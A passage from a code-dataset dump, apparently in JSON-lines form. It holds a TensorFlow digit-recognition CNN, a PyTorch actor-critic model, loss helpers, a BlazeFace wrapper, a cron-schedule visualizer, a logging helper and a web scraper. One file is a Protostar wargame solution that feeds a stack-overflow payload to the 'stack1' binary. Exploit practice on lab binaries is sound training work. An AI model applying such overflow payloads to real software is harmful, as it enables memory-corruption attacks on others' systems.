num_complete_minibatches):\n        mini_batch_X = shuffled_X[k * mini_batch_size: (k + 1) * mini_batch_size, :, :, :]\n        mini_batch_Y = shuffled_Y[k * mini_batch_size: (k + 1) * mini_batch_size, :]\n        # Each mini-batch is a tuple of shuffled X and Y\n        mini_batch = (mini_batch_X, mini_batch_Y)\n        # Collect the batches; mini_batches ends up as a list of (X, Y) tuples\n        mini_batches.append(mini_batch)\n    \n    # If the sample count is not divisible by the batch size, add the leftover samples too\n    if (m % mini_batch_size != 0):\n        mini_batch_X = shuffled_X[num_complete_minibatches * mini_batch_size: m, :, :, :]\n        mini_batch_Y = shuffled_Y[num_complete_minibatches * mini_batch_size: m, :]\n        mini_batch = (mini_batch_X, mini_batch_Y)\n        mini_batches.append(mini_batch)\n    \n    # Return the collected mini-batches\n    return mini_batches\n    \n# Placeholders for X and Y\nX = tf.placeholder(dtype=tf.float32, shape=[None, 28, 28, 1], name = \"X\")\nY = tf.placeholder(dtype=tf.float32, shape=[None, 10], name = \"Y\")\n# Boolean placeholder marking whether we are in the training part of the graph.\n# Depending on what you fetch, parts of the graph do not train; the batch norm layers need this flag, since it affects their output mean and variance.\nis_training = tf.placeholder(tf.bool) 
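# fed as True only while optimizing, False at evaluation (see the feed_dicts below)\n# Illustrative call of random_mini_batches above (shapes assumed from the 80/20 split):\n#   batches = random_mini_batches(trainX, trainY, mini_batch_size=64, seed=0)\n#   (bx, by) = batches[0]  # bx: (64, 28, 28, 1), by: (64, 10)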
\n# Print to confirm the type and shape of X and Y\nprint(\"X = \" + str(X))\nprint(\"Y = \" + str(Y))\n\n# Define the three parameters W1, W2, W3, i.e. the convolution kernels; get_variable is like Variable, but reuses an existing variable or creates a new one\n# LeNet-5 has only two conv layers; three are defined here to enlarge the network\n# Xavier initialization is used: it keeps the output variance of each layer roughly equal so information flows well through the network; concretely it draws from a suitable uniform distribution\n# The first two kernel dimensions are its height and width, the third is the number of channels in the previous layer, and the fourth is the total number of filters\nW1 = tf.get_variable(\"W1\", shape=[3, 3, 1, 4], initializer=tf.contrib.layers.xavier_initializer()) # each kernel needs a name, a shape and an initializer\nW2 = tf.get_variable(\"W2\", shape=[3, 3, 4, 8], initializer=tf.contrib.layers.xavier_initializer())\nW3 = tf.get_variable(\"W3\", shape=[3, 3, 8, 8], initializer=tf.contrib.layers.xavier_initializer()) \n\n# Layer 1: CONV2D(Z1) -> BatchNorm(N1) -> RELU(A1) -> MAXPOOL(P1) -> \nZ1 = tf.nn.conv2d(input=X, filter=W1, strides=[1, 1, 1, 1], padding='SAME') # conv2d lives in tf.nn; it takes the input, kernel, strides and padding (SAME or VALID)\nN1 = tf.layers.batch_normalization(Z1, training=is_training) # batch norm lives in tf.layers! It speeds up training\nA1 = tf.nn.relu(N1) # ReLU activation on the previous result: max{x,0}\n# Convolution done; next comes pooling\nP1 = tf.nn.max_pool(value=A1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding=\"SAME\") # pooling also takes padding; note its ksize/strides format differs from the conv kernel?\n\n# Layer 2: CONV2D(Z2) -> BatchNorm(N2) -> RELU(A2) -> MAXPOOL(P2) -> \nZ2 = tf.nn.conv2d(input=P1, filter=W2, strides=[1, 1, 1, 1], padding='SAME')\nN2 = tf.layers.batch_normalization(Z2, training=is_training)\nA2 = tf.nn.relu(N2)\nP2 = tf.nn.max_pool(value=A2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n\n# Layer 3: CONV2D(Z3) -> BatchNorm(N3) -> RELU(A3) -> MAXPOOL(P3) -> \nZ3 = tf.nn.conv2d(input=P2, filter=W3, strides=[1, 1, 1, 1], padding='SAME')\nN3 = tf.layers.batch_normalization(Z3, training=is_training)\nA3 = tf.nn.relu(N3)\nP3 = tf.nn.max_pool(value=A3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n\n# Layer 4: FLATTEN(F3) -> FULLYCONNECTED(Z4) -> BatchNorm(N4) -> RELU(A4)\nF3 = tf.contrib.layers.flatten(P3) # tf.contrib holds experimental APIs\nZ4 = tf.contrib.layers.fully_connected(F3, num_outputs=64, activation_fn=None) # first of two fully connected layers: 64 units, no activation here\nN4 = tf.layers.batch_normalization(Z4, training=is_training) # batch norm\nA4 = tf.nn.relu(N4)\n\n# Layer 5: a single fully connected layer acting as the softmax layer, 64 to 10\nZ5 = tf.contrib.layers.fully_connected(A4, num_outputs=10, activation_fn=None)\n\n# Cost function; reduce_mean averages over a given axis, or over all dimensions when no axis is passed.\n# NOTE: use softmax_cross_entropy_with_logits_v2 from now on, not the deprecated with_logits\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits=Z5, labels=Y))\n\n# Hyperparameters\nlearning_rate = 0.002\nnum_epochs = 50\nmini_batch_size = 64\n# costs starts as an empty list\ncosts = []\n\n# Optimizer\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\n# Variable initialization; by the way, every parameter created with get_variable lives in the global variable pool\ninit = tf.global_variables_initializer() \n\n# Open a new session and initialize\nsess = tf.Session()\nsess.run(init)\n\n# NOTE: because we use tf.layers.batch_normalization() instead of tf.contrib.layers.batch_norm(), \n# we must explicitly run the extra update ops that batch normalization needs (sess.run([training_op, extra_update_ops], ...)).\nextra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n\n# Outer loop over the epochs\nfor epoch in range(num_epochs):\n    # random_mini_batches returns the list of mini-batches\n    minibatches = random_mini_batches(trainX, trainY, mini_batch_size=mini_batch_size, seed=epoch + int(time.time()))\n    # Reset the epoch cost\n    epoch_cost = 0.\n    \n    # Inner loop over the minibatches list\n    for minibatch in minibatches:\n        # Each minibatch is a tuple; this unpacking is equivalent to minibatch[0], minibatch[1]\n        (minibatchX, 
minibatchY) = minibatch\n        # Values we don't need go to throwaway names; sess.run takes the fetches first, then feed_dict; this computes the cost defined above\n        _, mini_batch_cost, __ = sess.run([optimizer, cost, extra_update_ops], feed_dict={X: minibatchX, Y: minibatchY, is_training:True})\n        # The epoch cost is the sum of all mini-batch costs\n        epoch_cost += mini_batch_cost\n\n    # Average the epoch cost\n    epoch_cost /= len(minibatches)\n    # Append this epoch's cost to the costs list\n    costs.append(epoch_cost)\n    # Print only the even epochs (half the values)\n    if epoch % 2 == 0:\n        # Formatted output: %d is an integer, %f a float\n        print(\"No. %d epoch, cost = %f\" % (epoch, epoch_cost))\n    \n# Plot the costs against the epochs with plt\nplt.plot(costs)\nplt.xlabel(\"number of epochs\")\nplt.ylabel(\"cost\")\nplt.title(\"cost\")\n\n# predict_op is the index of the maximum along axis 1\npredict_op = tf.argmax(Z5, 1)\n# tf.equal returns an array of booleans: True where equal, False otherwise\ncorrect_prediction = tf.equal(predict_op, tf.argmax(Y, 1))\n# Cast the booleans to floats (True=1, False=0) and average to get the accuracy\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n\n# eval() is another way to run the computation: in TensorFlow you first define the graph and then execute it, usually with sess.run(); eval() is simply an alternative spelling of sess.run().\n# Training-set accuracy\n# With is_training=False, ops like dropout are disabled; it is True only while optimizing the parameters. Note that is_training goes into feed_dict.\ntrain_accuracy = accuracy.eval(session=sess, feed_dict={X: trainX, Y: trainY, is_training:False}) \n# Dev-set accuracy\ndev_accuracy = accuracy.eval(session=sess, feed_dict={X: devX, Y: devY, is_training:False})\n# Print\nprint(\"train_accuracy = \" + str(train_accuracy))\nprint(\"dev_accuracy = \" + str(dev_accuracy))\n\n# Predictions on the test set\ntestY_pred = predict_op.eval(session=sess, feed_dict={X: testX, is_training:False})\n# Save as a one-column dataframe labelled \"Label\"\ntestYDf = pd.DataFrame(testY_pred.reshape(-1, 1), index=np.arange(1, 1 + len(testY_pred)), columns=[\"Label\"]) # the index must start at 1\n# Write to csv\ntestYDf.to_csv(\"test_predict.csv\", index=True, index_label=\"ImageId\")\n","sub_path":"CNNfordigits.py","file_name":"CNNfordigits.py","file_ext":"py","file_size_in_byte":12952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"35287920","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom utils import build_hidden_layer\n\nclass ActorCritic(nn.Module):\n    def __init__(self,state_size,action_size,shared_layers,\n                 critic_hidden_layers=[],actor_hidden_layers=[],\n                 seed=0, init_type=None):\n        \"\"\"Initialize parameters and build policy.\n        Params\n        ======\n            state_size (int): Dimension of each state\n            action_size (int): Dimension of each action\n            shared_layers (list(int)): Dimension of the shared hidden layers\n            critic_hidden_layers (list(int)): Dimension of the critic's hidden layers\n            actor_hidden_layers (list(int)): Dimension of the actor's hidden layers\n            seed (int): Random seed\n            init_type (str): Initialization type\n        \"\"\"\n        super(ActorCritic, self).__init__()\n        self.init_type = init_type\n        self.seed = torch.manual_seed(seed)\n        self.sigma = nn.Parameter(torch.zeros(action_size))\n\n        # Add shared hidden layer\n        self.shared_layers = build_hidden_layer(input_dim=state_size,\n                                                hidden_layers=shared_layers)\n\n        # Add critic layers\n        if critic_hidden_layers:\n            # Add hidden layers for critic net if critic_hidden_layers is not empty\n            self.critic_hidden = build_hidden_layer(input_dim=shared_layers[-1],\n                                                    hidden_layers=critic_hidden_layers)\n            self.critic = nn.Linear(critic_hidden_layers[-1], 1)\n        else:\n            self.critic_hidden = None\n            self.critic = nn.Linear(shared_layers[-1], 1)\n\n        # Add actor layers\n        if actor_hidden_layers:\n            # Add hidden layers for actor net if actor_hidden_layers is 
not empty\n self.actor_hidden = build_hidden_layer(input_dim=shared_layers[-1],\n hidden_layers=actor_hidden_layers)\n self.actor = nn.Linear(actor_hidden_layers[-1], action_size)\n else:\n self.actor_hidden = None\n self.actor = nn.Linear(shared_layers[-1], action_size)\n\n # Apply Tanh() to bound the actions\n self.tanh = nn.Tanh()\n\n # Initialize hidden and actor-critic layers\n if self.init_type is not None:\n self.shared_layers.apply(self._initialize)\n self.critic.apply(self._initialize)\n self.actor.apply(self._initialize)\n if self.critic_hidden is not None:\n self.critic_hidden.apply(self._initialize)\n if self.actor_hidden is not None:\n self.actor_hidden.apply(self._initialize)\n\n def _initialize(self, n):\n \"\"\"Initialize network weights.\n \"\"\"\n if isinstance(n, nn.Linear):\n if self.init_type=='xavier-uniform':\n nn.init.xavier_uniform_(n.weight.data)\n elif self.init_type=='xavier-normal':\n nn.init.xavier_normal_(n.weight.data)\n elif self.init_type=='kaiming-uniform':\n nn.init.kaiming_uniform_(n.weight.data)\n elif self.init_type=='kaiming-normal':\n nn.init.kaiming_normal_(n.weight.data)\n elif self.init_type=='orthogonal':\n nn.init.orthogonal_(n.weight.data)\n elif self.init_type=='uniform':\n nn.init.uniform_(n.weight.data)\n elif self.init_type=='normal':\n nn.init.normal_(n.weight.data)\n else:\n raise KeyError('initialization type is not found in the set of existing types')\n\n def forward(self, state):\n \"\"\"Build a network that maps state -> (action, value).\"\"\"\n def apply_multi_layer(layers,x,f=F.leaky_relu):\n for layer in layers:\n x = f(layer(x))\n return x\n\n state = apply_multi_layer(self.shared_layers,state)\n\n v_hid = state\n if self.critic_hidden is not None:\n v_hid = apply_multi_layer(self.critic_hidden,v_hid)\n\n a_hid = state\n if self.actor_hidden is not None:\n a_hid = apply_multi_layer(self.actor_hidden,a_hid)\n\n a = self.tanh(self.actor(a_hid))\n value = self.critic(v_hid).squeeze(-1)\n return a, value\n","sub_path":"p2_continuous-control/actor_critic.py","file_name":"actor_critic.py","file_ext":"py","file_size_in_byte":4324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"79741013","text":"import tensorflow as tf\nimport numpy as np\n\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.framework import ops\n\ndef sparse_cost_sensitive_loss (logits, labels, cost_matrix):\n batch_cost_matrix = tf.nn.embedding_lookup(cost_matrix, labels)\n eps = 1e-6\n probability = tf.clip_by_value(tf.nn.softmax(logits), eps, 1-eps)\n cost_values = tf.log(1-probability)*batch_cost_matrix\n loss = tf.reduce_mean(-tf.reduce_sum(cost_values, axis=1))\n return loss\n\n\ndef onehot(data,label_dict={'boat':1,'nature':0}):\n a = np.array([label_dict[k] for k in data])\n b = np.zeros((len(a),a.max()+1))\n b[np.arange(len(data)),a] = 1\n return b.astype(np.int32)\n\n\ndef weighted_ce(targets, logits, beta, name=None):\n \"\"\"Computes a weighted cross entropy like in \n http://www.vision.ee.ethz.ch/~cvlsegmentation/driu/data/paper/DRIU_MICCAI2016.pdf\n cross entropy is computed as follows:\n z * -log(sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x))\n = z * -log(1 / (1 + exp(-x))) + (1 - z) * -log(exp(-x) / (1 + exp(-x)))\n = z * log(1 + exp(-x)) + (1 - z) * (-log(exp(-x)) + log(1 + exp(-x)))\n = z * log(1 + exp(-x)) + (1 - z) * (x + log(1 + exp(-x))\n = (1 - z) * x + log(1 + exp(-x))\n = x - x * z + log(1 + exp(-x))\n \"\"\"\n with 
ops.name_scope(name, \"logistic_loss\", [logits, targets]) as name:\n        logits = ops.convert_to_tensor(logits, name=\"logits\")\n        targets = ops.convert_to_tensor(targets, name=\"targets\")\n        targets = tf.cast(targets,tf.float32)\n        try:\n            targets.get_shape().merge_with(logits.get_shape())\n        except ValueError:\n            raise ValueError(\n                \"logits and targets must have the same shape (%s vs %s)\" %\n                (logits.get_shape(), targets.get_shape()))\n        targets = tf.math.add(targets,tf.keras.backend.epsilon())\n        zeros = array_ops.zeros_like(logits, dtype=logits.dtype)\n        cond = (logits >= zeros)\n        relu_logits = array_ops.where(cond, logits, zeros)\n        neg_abs_logits = array_ops.where(cond, -logits, logits)\n        return tf.reduce_mean(tf.math.abs((math_ops.add(\n            beta * (relu_logits - logits * targets),  # false negatives\n            (1-beta)*(math_ops.log1p(math_ops.exp(neg_abs_logits))),  # false positives\n            name=name))))\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"604316496","text":"import cv2\nimport torch\nimport numpy as np\nfrom pathlib import Path\nfrom typing import Sequence, Iterator, List\n\nfrom app.nn_inference.common.base_wrapper import BaseWrapper\nfrom app.base_types import Image\nfrom app.result_types import FaceResult\nfrom app.nn_inference.faces.BlazeFace_PyTorch.blazeface import BlazeFace\nfrom app.nn_inference.common.utils import chunks\n\n\nclass BlazeFaceWrapper(BaseWrapper):\n    \"\"\"\n    BlazeFace model\n    Original implementation at https://github.com/hollance/BlazeFace-PyTorch\n    \"\"\"\n\n    def __init__(self, batch_size: int = 2) -> None:\n        current_dir = Path(__file__).parent\n        base_path = current_dir.parent / \"BlazeFace_PyTorch\"\n        self.anchors_path = base_path / \"anchors.npy\"\n        self.weights_path = base_path / \"blazeface.pth\"\n\n        self.device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n        self.model = BlazeFace()\n\n        self.model.min_score_thresh = 0.75\n        self.model.min_suppression_threshold = 0.3\n\n        self.batch_size = batch_size\n\n    def __repr__(self):\n        return f\"BlazeFace model on {self.device}\"\n\n    def load(self) -> bool:\n        try:\n            self.model.to(self.device)\n            self.model.load_anchors(str(self.anchors_path))\n            self.model.load_weights(str(self.weights_path))\n            return True\n        except Exception as e:\n            print(\"Loading weight and anchors failed\", e)\n            return False\n\n    def unload(self) -> None:\n        self.model.to(\"cpu\")\n\n    def preprocess(self, images: Sequence[Image]) -> Iterator[Image]:\n        return (cv2.cvtColor(image, cv2.COLOR_BGR2RGB) for image in images)\n\n    def predict(self, images: Sequence[Image]) -> List[FaceResult]:\n        ready_images = np.asarray(tuple(self.preprocess(images)))\n        if len(ready_images) == 1:\n            predictions = self.model.predict_on_image(ready_images[0]).cpu().numpy()\n            if predictions.shape[0] > 0:\n                # index the detections like the batch path below:\n                # columns 0:4 bounding box, 4:16 keypoints, 16 score\n                return [FaceResult(predictions[:, 16].tolist(),\n                                   predictions[:, 0:4].tolist(),\n                                   predictions[:, 4:16].tolist()), ]\n            else:\n                return [FaceResult()]\n        else:\n            predictions = list()\n            batches = chunks(ready_images, self.batch_size)\n            for batch in batches:\n                predictions.extend(self.model.predict_on_batch(batch))\n            return list(map(lambda pred: FaceResult(pred[:, 16].tolist(),\n                                                    pred[:, 0:4].tolist(),\n                                                    pred[:, 4:16].tolist())\n                            if pred.shape[0] > 0\n                            else FaceResult(), 
predictions))\n","sub_path":"app/nn_inference/faces/wrappers/blaze_face_wrapper.py","file_name":"blaze_face_wrapper.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"454127660","text":"#!/usr/bin/python\n\nfrom subprocess import Popen\nfrom subprocess import PIPE\nimport os # os.path.join(), os.getcwd()\n\nBINARY_NAME = \"stack1\"\n\n\ndef main():\n # LOCAL VARIABLES\n currEnv = os.environ.copy()\n absBinFilename = os.path.join(os.getcwd(), BINARY_NAME)\n payload = (\"HarkRulz\" * 8) + \"dcba\"\n commandList = []\n\n # VERIFY FILE \n if not os.path.isfile(absBinFilename):\n raise IOError(\"{} not found\".format(absBinFilename))\n\n # RUN IT\n commandList.append(absBinFilename)\n commandList.append(payload)\n binary = Popen(commandList, env = currEnv, stdin = PIPE)\n if binary is not None:\n binary.communicate()\n\n # DONE\n return\n\n\nif __name__ == \"__main__\":\n try:\n main()\n except Exception as err:\n print(repr(err))\n","sub_path":"more_linux/protostar-bin/stack1-solution.py","file_name":"stack1-solution.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"391239677","text":"# Copyright 2016 CloudComputingHUST\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\nimport configparser\nimport os.path\n\n_FILE_CONFIG_ = '/etc/keese/keese.conf'\n\nclass Conf(object):\n\tdebug = False\n\tconnection = None\n\n\tdef __init__(self):\n\t\t\t#debug here\n\t\tif (os.path.isfile(_FILE_CONFIG_) == False):\n\t\t\tprint(_FILE_CONFIG_ + \" not found!\");\n\n\t\tcfg = configparser.ConfigParser()\n\t\tcfg.read(_FILE_CONFIG_)\n\t\tself.debug = cfg.getboolean('default', 'debug')\n\t\tself.connection = cfg.get('database', 'connection')\n","sub_path":"keese/common/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"451921626","text":"from django.shortcuts import render\nfrom django.conf import settings\nfrom crontab import CronTab\nfrom datetime import datetime, timedelta\nimport time\nimport itertools\nimport os\nfrom collections import defaultdict \n\n\n# Create your views here.\n\n# def index(request):\n# items = [\n# {'id' : 1, 'content' : 'item 1', 'start' : '2014-04-20'},\n# {'id' : 2, 'content' : 'item 2', 'start' : '2014-04-17'},\n# {'id' : 3, 'content' : 'item 3', 'start' : '2014-04-17'},\n# {'id' : 4, 'content' : 'item 4', 'start' : '2014-04-17'},\n# {'id' : 5, 'content' : 'item 5', 'start' : '2014-04-17'},\n# {'id' : 6, 'content' : 'item 6', 'start' : '2014-04-18'}, \n# {'id' : 7, 'content' : 'item 7', 'start' : '2014-04-16', 'end' : '2014-04-19'}\n# ]\n \n# context = {'items': items}\n# return render(request, 'cronvis/index.html', context)\ndef today(request):\n return 404\n\n\ndef index(request, start=None, end=None, mode='Timeline'):\n # cronlines = [\n # '30 5 * * *\t/srv/ReTransDjango/bin/manage LindtUnscheduledFile >> /srv/ReTransDjango/var/log/scripts/LindtUnscheduledFile.log 2>&1\\n',\n # '45 13 * * *\t/srv/ReTransDjango/bin/manage LindtUnscheduledFile >> /srv/ReTransDjango/var/log/scripts/LindtUnscheduledFile.log 2>&1\\n',\n # '30 19 * * *\t/srv/ReTransDjango/bin/manage ReturnLindtCSVFile >> /srv/ReTransDjango/var/log/scripts/ReturnLindtCSVFile.log 2>&1\\n',\n # '45 4,11,15 * * *\t/srv/ReTransDjango/bin/manage ReturnLindtCSVFile >> /srv/ReTransDjango/var/log/scripts/ReturnLindtCSVFile.log 2>&1\\n',\n # ]\n print(request, start, end, mode) \n cronfile = open(os.path.join(settings.BASE_DIR, 'crontab.txt'))\n cronlines = [l for l in cronfile.readlines() if not l.startswith('#') and l != '\\n']\n #cronlines = cronlines[:50]\n cronfile.close()\n print('Making events for %s cronlines' % len(cronlines))\n \n now = datetime.now()\n\n if not start:\n start = now.replace(hour=0, minute=0, second=0)\n if not end:\n end = now.replace(hour=23, minute=58, second=59) \n template = 'cronvis/index.html'\n context = {}\n\n if mode == 'Timeline':\n items, options = getTimelineData(cronlines, start, end)\n elif mode == 'Histogram':\n items, options = getHistogramData(cronlines, start, end)\n elif mode == 'Frequency':\n items, options = getFrequencyData(cronlines, start, end)\n\n\n context['items'] = items\n context['options'] = options\n\n context['mode'] = mode\n\n return render(request, template, context)\n\n\ndef getFrequencyData(cronlines, start, end):\n eventId = itertools.count(1)\n items = []\n groups = {}\n groupId = itertools.count(1)\n items = []\n height = defaultdict(int) \n seen_times = [] # some optimization\n for i, line in enumerate(cronlines):\n events = getWeekEvents(line)\n for event in events:\n 
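# tally how many scheduled events share each timestamp; used as the y offset for the items built below\n            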
height[event.strftime('%Y-%m-%dT%H:%M:%S')]+=1\n time_map = defaultdict(list) \n for i, line in enumerate(cronlines):\n try:\n events = getWeekEvents(line)\n jobName = line.split()[6]\n if jobName not in groups.keys():\n croncode = ' '.join(line.split()[:5])\n \n \n for event in events:\n time_map[event.isoformat()].append(jobName)\n if event.strftime('%Y-%m-%dT%H:%M:%S') not in seen_times:\n items.append(\n {'id' : eventId.next(), 'y': height[event.strftime('%Y-%m-%dT%H:%M:%S')], 'content' : jobName, 'x' : event.strftime('%Y-%m-%dT%H:%M:%S'),}\n )\n seen_times.append(event.strftime('%Y-%m-%dT%H:%M:%S'))\n print('Processed %s of %s lines' % (i+1, len(cronlines)))\n except ValueError as e:\n print(\"Value Error: \", e)\n\n options = {\n 'start' : (datetime.now() - timedelta(hours=1)).isoformat(),\n 'end': (datetime.now() + timedelta(hours=2)).isoformat(),\n 'min' : start.isoformat(),\n 'max' : end.isoformat(),\n 'timeAxis' : { \n 'scale' : 'minute',\n 'step' : 5\n },\n 'zoomMax' : 129600000, #36 hours in ms\n 'zoomMin' : 6000000,\n }\n options['timeMap'] = dict(time_map)\n \n return (items, options)\n\n\n\ndef getHistogramData(cronlines, start, end):\n\n cronlines = cronlines[:50]\n\n eventId = itertools.count(1)\n items = []\n groups = {}\n groupId = itertools.count(1)\n items = []\n for i, line in enumerate(cronlines):\n try:\n events = getWeekEvents(line)\n jobName = line.split()[6]\n if jobName not in groups.keys():\n croncode = ' '.join(line.split()[:5])\n groups[jobName] = {'id': groupId.next(), 'cronline': croncode}\n \n for event in events:\n items.append(\n {'id' : eventId.next(), 'y': 1, 'content' : jobName, 'x' : event.strftime('%Y-%m-%dT%H:%M:%S'), 'group':groups[jobName]['id']}\n )\n print('Processed %s of %s lines' % (i+1, len(cronlines)))\n except ValueError as e:\n print(\"Value Error: \", e)\n\n options = {\n 'start' : (datetime.now() - timedelta(hours=1)).isoformat(),\n 'end': (datetime.now() + timedelta(hours=2)).isoformat(),\n 'min' : start.isoformat(),\n 'max' : end.isoformat(),\n 'timeAxis' : { \n 'scale' : 'minute',\n 'step' : 5\n },\n 'zoomMax' : 129600000, #36 hours in ms\n 'zoomMin' : 6000000,\n 'style': 'bar',\n 'barChart': {'align' : 'right'},\n #'height': '750px',\n }\n\n formatted_groups = []\n for group in groups:\n element = {}\n element['id'] = groups[group]['id']\n element['content'] = group\n element['cronline'] = groups[group]['cronline']\n formatted_groups.append(element)\n options['_groups'] = formatted_groups\n \n return (items, options)\n\n\n\n\ndef getTimelineData(cronlines, start, end):\n eventId = itertools.count(1)\n items = []\n\n for i, line in enumerate(cronlines):\n try:\n events = getWeekEvents(line)\n jobName = line.split()[6]\n for event in events:\n items.append(\n {'id' : eventId.next(), 'content' : jobName, 'start' : event.strftime('%Y-%m-%dT%H:%M:%S')}\n )\n print('Processed %s of %s lines' % (i+1, len(cronlines)))\n except ValueError as e:\n print(\"Value Error: \", e)\n\n options = {\n 'start' : datetime.now().isoformat(),\n 'end': (datetime.now() + timedelta(hours=2)).strftime('%b %d %Y'),\n 'min' : start.strftime('%b %d %Y'),\n 'max' : end.strftime('%b %d %Y'),\n 'timeAxis' : { \n 'scale' : 'minute',\n 'step' : 15 \n },\n 'zoomMax' : 604800000,\n 'zoomMin' : 6000000\n }\n \n return (items, options)\n\ndef getWeekEvents(cronEntry):\n \"\"\" Return a list of datetimes representing every scheduled instance of a \n cron job described by cronEntry \"\"\"\n croncode = ' '.join(cronEntry.split()[:5])\n c = CronTab(croncode)\n now = 
datetime.now().replace(hour=0, minute=0, second=0)\n    weekStart = now - timedelta(days=now.weekday())\n    weekEnd = weekStart + timedelta(days=6)\n    now = weekStart\n    events = []\n\n    while now <= weekEnd:\n        secToNext = c.next(now=now, default_utc=False)\n        nextEvent = roundTime(now + timedelta(seconds=secToNext))\n        events.append(nextEvent)\n        now = nextEvent\n\n    return events\n\n\ndef roundTime(dt=None, roundTo=60):\n    \"\"\"Round a datetime object to any time laps in seconds\n    dt : datetime.datetime object, default now.\n    roundTo : Closest number of seconds to round to, default 1 minute.\n    Author: Thierry Husson 2012 - Use it as you want but don't blame me.\"\"\"\n\n    if dt == None : dt = datetime.now()\n    seconds = (dt.replace(tzinfo=None) - dt.min).seconds\n    rounding = (seconds+roundTo/2) // roundTo * roundTo\n    return dt + timedelta(0,rounding-seconds,-dt.microsecond)\n","sub_path":"cronjobs/cronjobs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"177047181","text":"__author__ = 'Matthew'\n\nimport logging, sys\n\n\nclass LoggingFormatter(logging.Formatter):\n    err_fmt = \"%(levelname)s: [%(name)s] %(msg)s\"\n    dbg_fmt = \"[%(name)s] %(msg)s\"\n\n    def __init__(self, fmt=\"%(levelno)s: %(msg)s\"):\n        logging.Formatter.__init__(self, fmt)\n\n    def format(self, record):\n\n        format_orig = self._fmt\n\n        if record.levelno == logging.INFO:\n            self._fmt = LoggingFormatter.dbg_fmt\n\n        else:\n            self._fmt = LoggingFormatter.err_fmt\n\n        result = logging.Formatter.format(self, record)\n\n        self._fmt = format_orig\n\n        return result\n\n\ndef attach():\n    fmt = LoggingFormatter()\n    hdlr = logging.StreamHandler(sys.stdout)\n    hdlr.setFormatter(fmt)\n\n    logging.root.addHandler(hdlr)\n","sub_path":"util/logman.py","file_name":"logman.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"635110883","text":"import csv\r\nimport urllib.request\r\nfrom bs4 import BeautifulSoup\r\n\r\nBASE_URL = 'https://www.citrus.ua/noutbuki-i-ultrabuki/'\r\n\r\ndef get_html(url):\r\n    response = urllib.request.urlopen(url)\r\n    return response.read()\r\n\r\ndef get_page_count(html):\r\n    soup = BeautifulSoup(html, features='lxml')\r\n    pagination = soup.find('div', class_='pagination-container')\r\n    return int(pagination.find_all('a')[-2].text)\r\n\r\ndef parse(html):\r\n    soup = BeautifulSoup(html, features='lxml')\r\n\r\n    table = soup.find('div', class_='catalog__items')\r\n\r\n    projects= []\r\n\r\n    for row in table.find_all(class_='product-card__overview'):\r\n\r\n        title = row.find_all('div', class_='product-card__name')\r\n        price = row.find_all('div', class_='prices__price')\r\n        projects.append({\r\n\r\n            # 'title': title[0].a.text.strip(),\r\n            'title': title[0].a['title'],\r\n            'price': price[0].span.text.strip(),\r\n\r\n        })\r\n\r\n\r\n    return projects\r\n\r\n\r\n\r\ndef save(projects, path):\r\n    with open(path, 'w') as csvfile:\r\n        writer = csv.writer(csvfile)\r\n        writer.writerow(('Title', 'Price'))\r\n\r\n        for project in projects:\r\n            writer.writerow((project['title'], (project['price'])))\r\n\r\n\r\ndef main():\r\n\r\n    page_count = get_page_count(get_html(BASE_URL))\r\n    print('Total pages:', page_count)\r\n\r\n    projects = []\r\n\r\n    for page in range(1, page_count):\r\n        print('Parsing %d%%' % (page / page_count * 100))\r\n        projects.extend(parse(get_html(BASE_URL + '?page_%d' % page)))\r\n    print(\"Parsing 
